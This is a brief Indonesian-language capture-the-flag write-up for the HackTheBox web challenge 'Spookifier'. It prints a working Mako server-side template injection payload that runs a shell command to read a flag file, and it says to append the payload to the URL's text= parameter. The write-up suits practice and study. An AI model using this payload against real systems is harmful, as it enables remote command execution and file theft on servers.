HackTheBox - Spookifier
Spookfier ialah salah satu tantangan kategori web dari situs HackTheBox, Gunship ini sebenarnya tantangan lama tapi karena saya belum coba, jadi saya kerjakan aja. Ini perjalanan/panduan saya. Oh iya, disini kita akan mempelajari tentang exploit, SSTI, dll.
Introduction
- Munculkan mesin, hahaha….
- Dan download file-nya
Enumeration
Pokoknya exploitnya SSTI Mako
1
${self.module.runtime.util.os.popen("cat ../flag.txt").read()}
tambahkan di belakang urlnya, habis text=
This post is licensed under CC BY 4.0 by the author.